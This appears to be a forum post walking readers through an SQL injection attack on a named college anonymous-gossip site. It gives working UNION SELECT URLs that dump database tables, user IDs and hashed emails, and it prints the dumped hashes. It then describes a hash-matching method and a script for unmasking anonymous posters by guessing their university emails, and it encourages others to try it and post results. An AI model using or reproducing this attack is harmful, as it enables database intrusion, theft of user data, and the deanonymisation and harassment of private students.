The whole site is vulnerable to something called SQL-Injection.

The following link shows all of the vulnerable fields on a given webpage (using a
random thread, you could use any one you wanted though)
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL
ECT+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

As we can see, 1,3,4,5,6,7,8,9 are all vulnerable fields where we can put data we
want pulled from the SQL-database (the thing that holds user-id's and emails).

I'm going to skip a few parts here and get to the nitty-gritty of the matter. The
overall database is called "acb" and it has the following tables:
tbl_attempts,tbl_crush,tbl_emails,tbl_free_posts,tbl_message_headers,tbl_messages,
tbl_moderators,tbl_newpasses,tbl_original_posts,tbl_recentmail,tbl_replies,tbl_rep
orts,tbl_schools,tbl_topics,tbl_users,tbl_views,tbl_votes

tbl_crush looks potentially embarrassing, as does tbl_messages, but right now

we're after tbl_emails tbl_replies tbl_topics and tbl_users.

The thing is, when we specify what table we want to check out, instead of writing
"tbl_users", we have to write it in Hex. So we get the following url (change the
hex code for tbl_users to the hex code for any other table you want):
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL
ECT+ALL+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14+from+information_
schema.columns+where+table_name=0x74626C5F7573657273--

This table has the following fields:

id,email,password,num_bans,ban,school_tag,time,fb_id,activation

What does this mean? It means that every email has a specific ID number attached
to it (as well as the number of bans said person has received). Let's pull out ID
and email, using the following (should be obvious how it was done, if you're
playing along at home):
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL
ECT+ALL+1,2,3,group_concat(id,0x3a,email),5,6,7,8,9,10,11,12,13,14+from+tbl_users-
-

Now, lets look at the output:

1:2651ff645f9949cd88e65aa0c733a22
2:1351a3c14ae48d5462cc1096ebadb94
3:43acb94e5432110d6604718b8c7f81f
4:c10caae0a314510031f6aaac754f084
5:fcb046a1aa98eb4fe7b98c0f9d6cb4a
6:487a7afeeaa5a00cae8f191abacf1b0
7:cd17ec6c819d64ac575bf3b0531c6c5
8:b72c1c9a78f8ac6eaffa1c129555bb7
9:5b42058073d035b6c6242eaa7876611
10:8c0d386e56576a31d7c64d2123d0952
11:1f5067ee8d726b3549122852d60237d
12:e96a0663305e7053a4a4d6e9bfb1ec3
13:b635dc909f8883090eecda1b2831bd6
14:3ee438b984b69c6f862e45ff7ce0550
15:213cf12185143e9793361bd98396420
16:c7753566d9a7c811e7441624a707b9b
17:fc6aa936d018d93bc86b46a723d728d
18:7b31866f43862f5640139ff1687e968
19:5be6fb314ba1bf898838c4776c060f8
20:204c00ef9a61e7be72f338db07f27cd
21:644b220fb11b108b59f3be286186372
22:6834320ff262f7340b88c83232d77d9
23:a0b4ad04099b001007e800589b98c92
24:84ac74750c3aa18fc9b9dfb481afb20
25:e2c37b7c5f85f7d3822d7f34df07a24
26:059f15d50c08c2481bbf4abeb424d71
27:112dbae75e470ef53cf88ac4226158d
28:ddf59f65913c9c4ddbe788db15d83e5
29:ea2cc6275a3f8b4f982756ebaceef68

We've obviously reached some kind of character limit, so (unfortunately) we have

to run the code multiple times using something like this to start our count at the
truncated user (user 30 was cut off, in this case):
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL
ECT+ALL+1,2,3,group_concat(id,0x3a,email),5,6,7,8,9,10,11,12,13,14+from+tbl_users+
where+id%3E29--
See.. we're asking to get data from tbl_users where id>29. Just run this multiple
times over and over and you'll get all the data you need (in about 30 minutes I
pulled about 3000 accounts, can share if needed)

But look, the email is encrypted. Any good cryptologist can see that this is just
the SQL PASSWORD() command. While it's very hard to break PASSWORD(), the
designers of the site did something wonderful for us.. "tbl_emails" lists two
fields, "email" and "school". If we run the following, we see users emails and the
school they are associated with..
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL
ECT+ALL+1,2,3,group_concat(email,0x3a,school),5,6,7,8,9,10,11,12,13,14+from+tbl_em
ails--

Now we can limit the search to only include school "jhu", and once we have all
these emails, we can simply run them through MYSQL's PASSWORD() command and match
the encrypted return up with one we pulled from the database, then modify our
search parameters to exclude those emails and continue on ad naseum.

That's not really what most of us want. We want to see who could probably be
posting about us, or somebody we know. So instead, it's much easier to encrypt-
then-match people's JHED emails that you know. Let's say I think Frat Brother #4
posted something bad about my buddy, luckily I know his name and can guess his
JHED (and, trust me, ~90% of people here signed up with their JHEDs). So I run
PASSWORD(adouche1@jhu.edu), get an encrypted string, and match it up to the data I
pulled so I can see what user-id is attached to it. If there's no hit, I try
PASSWORD(adouche2@jhu.edu), increasing the number up to some reasonable value
before giving up.

Once we have an email account's ID number, its all a matter of sorting through
tbl_replies or tbl_topics and sorting by user ID to see what this one person has
posted. There are many more refined methods of doing this, but this is probably
the one people will want to know how to do. It's also possible to just select one
field (I like field 5) in a given thread and have it display that person's id
number, or anything else if you're so possibly inclined. Play around, get a feel
for the database architecture, and you can do some cool stuff.

Oh, and a note to people using emails different than their JHED-given ones.. the
school's database should allow you to teash out what emails are registered to what
JHED-ID (looking at you, pedobear@jhu.edu). Trying to find a way to link them, it
shouldn't be that hard.

Who would go through all of this trouble? Well, it's not that much of a hassle if
you can write up some scripts to do it for you. Which I did.. a little perl script
that goes through the school's directory (pulled an offline copy), gets each
person's name and makes a presumed JHED email for them based on their first
initial, up to 6 letters of their last name, and gives them a number based on
frequency. It also generates a first-initial-last-name@jhu.edu address to test
too. Then it batch-encrypted them, and matched to ID numbers, and now I've got
over 3000 accounts open for business.

I won't be sharing these. Suffice to say, somebody knows everything you've posted
now. You guys should be nicer to eachother.

Total time for the home hacker: 3 hours, give or take. It's a good way to learn
how to NOT set up a secure database, too.

Total time for YOLO: an hour, if you can stick with it. Then you'll know
everything your best friend has been saying about you :) [seriously, watching this
is like watching a soap opera, its awesome]

Have fun! Post results!